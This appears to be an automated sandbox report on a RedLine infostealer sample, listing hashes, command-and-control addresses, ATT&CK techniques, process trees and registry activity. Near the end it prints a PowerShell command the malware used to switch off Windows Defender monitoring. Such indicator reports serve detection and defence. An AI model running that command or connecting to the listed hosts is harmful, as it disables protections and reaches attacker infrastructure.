redline | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Resubmissions

10-11-2021 14:50

211110-r7nbvaeddr 10

08-11-2021 16:12

211108-tnmmbahgaj 10

08-11-2021 15:26

211108-svdsbaccf6 10

08-11-2021 14:48

211108-r6lfvshdfn 10

Analysis

max time kernel
74s
max time network
190s
platform
windows11_x64
resource
win11
submitted
10-11-2021 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Size

3.5MB
MD5

a75539ada819b941531f116f3d50b13b
SHA1

942d264f3b0cc866c84114a06be4fa7aeb905b3c
SHA256

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0
SHA512

ee89498995cc1a9a91c754c391082f7e38fa22fee413033b6cb9318a0008baa7e8bfcf2a1c3aebc3fa1c0cbace33c27b8979953868b01dc296c9e01e0c8e3b49

Score

10^/10

redline chris fucker2 media20 aspackv2 evasion infostealer persistence suricata trojan

Malware Config

Extracted

Family

redline

Botnet

media20

91.121.67.60:2151

Extracted

Family

redline

Botnet

Chris

194.104.136.5:46013

Extracted

Family

redline

Botnet

fucker2

135.181.129.119:4805

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5380 4924 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5380	4924	rundll32.exe

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral17/memory/3320-303-0x0000000000000000-mapping.dmp	family_redline
behavioral17/memory/4684-304-0x0000000000000000-mapping.dmp	family_redline
behavioral17/memory/4684-308-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral17/memory/3320-307-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral17/memory/4132-306-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 3360 created 1092	3360	WerFault.exe	setup_install.exe
PID 4076 created 5040	4076	WerFault.exe	Wed0983917533e.exe
PID 5564 created 5480	5564	WerFault.exe	rundll32.exe

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\libcurl.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 23 IoCs

Processes:

setup_installer.exesetup_install.exeWed090db89ca4c58.exeWed0944361c3621a67a6.exeWed09ed6b36e57df5f.exeWed0900caa0501dc98f.exeWed09c4c0c3d01.exeWed09d761ab4704dd931.exeWed0983917533e.exeWed09f69eef9c0d5b.exeWed09755e77ed017e8af.exeWed091bab77a3bb62d.exeWed0968d19e5ec37794.exeWed09fbe3bf81.exeWed09f69eef9c0d5b.tmpWed09f69eef9c0d5b.exeWed09f69eef9c0d5b.tmpI8TaQYBpLsJ.ExEWed09755e77ed017e8af.exeWed0968d19e5ec37794.exeWed09fbe3bf81.exe8uLRgNZ6Niuj_H8G31PyPiDc.exe8uLRgNZ6Niuj_H8G31PyPiDc.exe

pid	process
2552	setup_installer.exe
1092	setup_install.exe
4360	Wed090db89ca4c58.exe
4036	Wed0944361c3621a67a6.exe
4756	Wed09ed6b36e57df5f.exe
3720	Wed0900caa0501dc98f.exe
1624	Wed09c4c0c3d01.exe
2164	Wed09d761ab4704dd931.exe
5040	Wed0983917533e.exe
3376	Wed09f69eef9c0d5b.exe
2108	Wed09755e77ed017e8af.exe
4524	Wed091bab77a3bb62d.exe
2816	Wed0968d19e5ec37794.exe
964	Wed09fbe3bf81.exe
1372	Wed09f69eef9c0d5b.tmp
4732	Wed09f69eef9c0d5b.exe
1716	Wed09f69eef9c0d5b.tmp
2316	I8TaQYBpLsJ.ExE
4132	Wed09755e77ed017e8af.exe
3320	Wed0968d19e5ec37794.exe
4684	Wed09fbe3bf81.exe
2248	8uLRgNZ6Niuj_H8G31PyPiDc.exe
5448	8uLRgNZ6Niuj_H8G31PyPiDc.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 9 IoCs

Processes:

setup_install.exeWed09f69eef9c0d5b.tmpWed09f69eef9c0d5b.tmprundll32.exemsiexec.exe

pid	process
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1092	setup_install.exe
1372	Wed09f69eef9c0d5b.tmp
1716	Wed09f69eef9c0d5b.tmp
5480	rundll32.exe
5772	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

199 ipinfo.io
279 ipinfo.io
45 ipinfo.io
177 ipinfo.io
66 ipinfo.io
67 ipinfo.io
69 api.db-ip.com
166 ipinfo.io
278 ipinfo.io
2 ip-api.com
45 api.db-ip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
199	ipinfo.io
279	ipinfo.io
45	ipinfo.io
177	ipinfo.io
66	ipinfo.io
67	ipinfo.io
69	api.db-ip.com
166	ipinfo.io
278	ipinfo.io
2	ip-api.com
45	api.db-ip.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

Wed0968d19e5ec37794.exeWed09fbe3bf81.exe

description	pid	process	target process
PID 2816 set thread context of 3320	2816	Wed0968d19e5ec37794.exe	Wed0968d19e5ec37794.exe
PID 964 set thread context of 4684	964	Wed09fbe3bf81.exe	Wed09fbe3bf81.exe

Drops file in Windows directory 7 IoCs

Processes:

WerFault.exesvchost.exe

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1248	5040	WerFault.exe	Wed0983917533e.exe
1812	1092	WerFault.exe	setup_install.exe
5636	5480	WerFault.exe	rundll32.exe
5168	5740	WerFault.exe	rsL86slx0Ojy5qVIZaVs26uz.exe
1932	5692	WerFault.exe	etPzOqRZumUTHC3v0VREnGqS.exe
1592	5516	WerFault.exe	YHGffCS5fjrfTHHeKwpla0GZ.exe
5964	5856	WerFault.exe	1rdKDSa584uRrskyF8m7ILEW.exe
3124	5280	WerFault.exe	v_gPJHTZicC0QKetR7DdR9GX.exe
2168	5444	WerFault.exe	v_gPJHTZicC0QKetR7DdR9GX.exe
5176	5956	WerFault.exe	IzmZwpKAPCMJzsWMTfVRfmAO.exe
3432	932	WerFault.exe	Kwnybn4TViu2OZA2N_AQkPBw.exe
2308	2560	WerFault.exe	YxkrtS5eWMAryWIlumnfeyOr.exe
4360	5236	WerFault.exe	01_R5njpACaEFadqm6uaDXRu.exe
2344	2560	WerFault.exe	LQ07KTyrG5NjUJeS970zrCHE.exe

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5684 schtasks.exe
4840 schtasks.exe
3532 schtasks.exe
3208 schtasks.exe
3436 schtasks.exe

pid	process
5684	schtasks.exe
4840	schtasks.exe
3532	schtasks.exe
3208	schtasks.exe
3436	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1592 taskkill.exe
2872 taskkill.exe
2624 taskkill.exe

pid	process
1592	taskkill.exe
2872	taskkill.exe
2624	taskkill.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

WaaSMedicAgent.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWed091bab77a3bb62d.exe

pid	process
2276	powershell.exe
2276	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
2276	powershell.exe
1248	WerFault.exe
1248	WerFault.exe
1812	WerFault.exe
1812	WerFault.exe
5636	WerFault.exe
5636	WerFault.exe
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
3720
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe
4524	Wed091bab77a3bb62d.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

Processes:

powershell.exepowershell.exeWed09d761ab4704dd931.exeWed09c4c0c3d01.exeWerFault.exeWerFault.exetaskkill.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2164	Wed09d761ab4704dd931.exe
Token: SeDebugPrivilege	1624	Wed09c4c0c3d01.exe
Token: SeRestorePrivilege	1812	WerFault.exe
Token: SeBackupPrivilege	1812	WerFault.exe
Token: SeRestorePrivilege	1248	WerFault.exe
Token: SeBackupPrivilege	1248	WerFault.exe
Token: SeBackupPrivilege	1248	WerFault.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2276	powershell.exe
Token: SeSecurityPrivilege	2276	powershell.exe
Token: SeTakeOwnershipPrivilege	2276	powershell.exe
Token: SeLoadDriverPrivilege	2276	powershell.exe
Token: SeSystemProfilePrivilege	2276	powershell.exe
Token: SeSystemtimePrivilege	2276	powershell.exe
Token: SeProfSingleProcessPrivilege	2276	powershell.exe
Token: SeIncBasePriorityPrivilege	2276	powershell.exe
Token: SeCreatePagefilePrivilege	2276	powershell.exe
Token: SeBackupPrivilege	2276	powershell.exe
Token: SeRestorePrivilege	2276	powershell.exe
Token: SeShutdownPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeSystemEnvironmentPrivilege	2276	powershell.exe
Token: SeRemoteShutdownPrivilege	2276	powershell.exe
Token: SeUndockPrivilege	2276	powershell.exe
Token: SeManageVolumePrivilege	2276	powershell.exe
Token: 33	2276	powershell.exe
Token: 34	2276	powershell.exe
Token: 35	2276	powershell.exe
Token: 36	2276	powershell.exe
Token: SeIncreaseQuotaPrivilege	2224	powershell.exe
Token: SeSecurityPrivilege	2224	powershell.exe
Token: SeTakeOwnershipPrivilege	2224	powershell.exe
Token: SeLoadDriverPrivilege	2224	powershell.exe
Token: SeSystemProfilePrivilege	2224	powershell.exe
Token: SeSystemtimePrivilege	2224	powershell.exe
Token: SeProfSingleProcessPrivilege	2224	powershell.exe
Token: SeIncBasePriorityPrivilege	2224	powershell.exe
Token: SeCreatePagefilePrivilege	2224	powershell.exe
Token: SeBackupPrivilege	2224	powershell.exe
Token: SeRestorePrivilege	2224	powershell.exe
Token: SeShutdownPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeSystemEnvironmentPrivilege	2224	powershell.exe
Token: SeRemoteShutdownPrivilege	2224	powershell.exe
Token: SeUndockPrivilege	2224	powershell.exe
Token: SeManageVolumePrivilege	2224	powershell.exe
Token: 33	2224	powershell.exe
Token: 34	2224	powershell.exe
Token: 35	2224	powershell.exe
Token: 36	2224	powershell.exe
Token: SeShutdownPrivilege	5240	svchost.exe
Token: SeCreatePagefilePrivilege	5240	svchost.exe
Token: SeShutdownPrivilege	5240	svchost.exe
Token: SeCreatePagefilePrivilege	5240	svchost.exe
Token: SeShutdownPrivilege	5240	svchost.exe
Token: SeCreatePagefilePrivilege	5240	svchost.exe
Token: SeShutdownPrivilege	5296	svchost.exe
Token: SeCreatePagefilePrivilege	5296	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 816 wrote to memory of 2552	816	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	setup_installer.exe
PID 816 wrote to memory of 2552	816	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	setup_installer.exe
PID 816 wrote to memory of 2552	816	acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe	setup_installer.exe
PID 2552 wrote to memory of 1092	2552	setup_installer.exe	setup_install.exe
PID 2552 wrote to memory of 1092	2552	setup_installer.exe	setup_install.exe
PID 2552 wrote to memory of 1092	2552	setup_installer.exe	setup_install.exe
PID 1092 wrote to memory of 2020	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2020	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2020	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2092	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2092	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2092	1092	setup_install.exe	cmd.exe
PID 2020 wrote to memory of 2224	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 2224	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 2224	2020	cmd.exe	powershell.exe
PID 2092 wrote to memory of 2276	2092	cmd.exe	powershell.exe
PID 2092 wrote to memory of 2276	2092	cmd.exe	powershell.exe
PID 2092 wrote to memory of 2276	2092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 2880	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2880	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2880	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 4484	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 4484	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 4484	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3976	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3976	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3976	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2736	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2736	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2736	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3024	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3024	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3024	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3680	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3680	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3680	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3480	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3480	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3480	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3812	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3812	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 3812	1092	setup_install.exe	cmd.exe
PID 2736 wrote to memory of 4360	2736	cmd.exe	Wed090db89ca4c58.exe
PID 2736 wrote to memory of 4360	2736	cmd.exe	Wed090db89ca4c58.exe
PID 2736 wrote to memory of 4360	2736	cmd.exe	Wed090db89ca4c58.exe
PID 4484 wrote to memory of 4036	4484	cmd.exe	Wed0944361c3621a67a6.exe
PID 4484 wrote to memory of 4036	4484	cmd.exe	Wed0944361c3621a67a6.exe
PID 1092 wrote to memory of 1620	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 1620	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 1620	1092	setup_install.exe	cmd.exe
PID 2880 wrote to memory of 4756	2880	cmd.exe	Wed09ed6b36e57df5f.exe
PID 2880 wrote to memory of 4756	2880	cmd.exe	Wed09ed6b36e57df5f.exe
PID 2880 wrote to memory of 4756	2880	cmd.exe	Wed09ed6b36e57df5f.exe
PID 1092 wrote to memory of 1500	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 1500	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 1500	1092	setup_install.exe	cmd.exe
PID 3976 wrote to memory of 3720	3976	cmd.exe	Wed0900caa0501dc98f.exe
PID 3976 wrote to memory of 3720	3976	cmd.exe	Wed0900caa0501dc98f.exe
PID 3976 wrote to memory of 3720	3976	cmd.exe	Wed0900caa0501dc98f.exe
PID 1092 wrote to memory of 2104	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2104	1092	setup_install.exe	cmd.exe
PID 1092 wrote to memory of 2104	1092	setup_install.exe	cmd.exe
PID 3024 wrote to memory of 1624	3024	cmd.exe	Wed09c4c0c3d01.exe
PID 3024 wrote to memory of 1624	3024	cmd.exe	Wed09c4c0c3d01.exe

C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
"C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:816

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2552

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
